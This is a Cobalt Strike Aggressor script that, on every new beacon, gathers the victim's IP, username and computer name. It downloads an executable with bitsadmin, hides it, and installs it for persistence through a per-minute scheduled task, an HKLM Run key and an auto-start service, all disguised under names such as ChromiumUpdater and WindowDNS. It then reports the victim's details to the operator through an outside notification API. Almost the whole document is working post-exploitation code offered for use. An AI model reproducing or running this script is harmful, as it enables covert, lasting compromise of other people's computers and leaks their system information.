beacon_command_register(
"Go And Keep", 
"Keep the backdoor from remote device", 
"\nhttps://github.com/Haru1ca/Badusb-execute-backd00r-code");


on beacon_initial {
    sub http_get {
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];
        @content = readAll($handle);
        foreach $line (@content) {
            $output .= $line . "\r\n";
        }
        println($output);
    }
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    println('IP:'.$internalIP.'  UserName:'.$userName.'   ComputerName:'.$computerName)
	bshell($1, 'bitsadmin /transfer ChromiumUpdater /download /priority normal "put your self exe url here" "%LOCALAPPDATA%\beaconupdate.exe"');
    bshell($1, 'attrib %LOCALAPPDATA%\beaconupdate.exe +s +h');
    bshell($1, 'schtasks /create /tn WindowDNS /tr %LOCALAPPDATA%\beaconupdate.exe /sc minute /mo 1');
    bshell($1, 'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowDNS /t REG_SZ /d %LOCALAPPDATA%\beaconupdate.exe /f');
    bshell($1, 'sc create \"WindowDNS\" binpath= \"cmd /c start %LOCALAPPDATA%\beaconupdate.exe\"&&sc config \"WindowDNS\" start= auto&&net start WindowDNS');
	
    bshell($1, "attrib \"$filePath\" +s +h");
    bshell($1, "schtasks /create /tn Window_DNS /tr \"$filePath\" /sc minute /mo 1");
    bshell($1, "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v Window_DNS /t REG_SZ /d \"$filePath\" /f");
    bshell($1, "sc create \"Window_DNS \" binpath= \"cmd /c start \"$filePath\"\"&&sc config \"Window_DNS\" start= auto&&net start Window_DNS");

    if (!-isadmin $1){
        println("非管理员权限");
        bshell($1, 'bitsadmin /transfer ChromiumBUpdater /download /priority normal "put your self exe url here" "c:\\users\\'.$userName.'\\appdata\\local\\localupdate.exe"');
        bshell($1, "attrib.exe +h c:\\users\\".$userName."\\appdata\\local\\localupdate.exe");
        bshell($1, "schtasks /create /sc minute /mo 1 /tn 'ChromiumBUpdater' /tr c:\\users\\".$userName."\\appdata\\local\\localupdate.exe");
    } else {
        println("管理员权限");
        bshell($1, 'bitsadmin /transfer ChromiumBUpdater /download /priority normal "put your self exe url here" "c:\\users\\'.$userName.'\\appdata\\local\\localupdate.exe"');
        bshell($1, "attrib.exe +h c:\\users\\".$userName."\\appdata\\local\\localupdate.exe");
        bshell($1, "schtasks /create /sc minute /mo 1 /tn 'ChromiumBUpdater' /RL HIGHEST /tr c:\\users\\".$userName."\\appdata\\local\\localupdate.exe");
    }
    $url = 'https://sctapi.ftqq.com/APIKEY.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0AIP:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;

    http_get($url);

}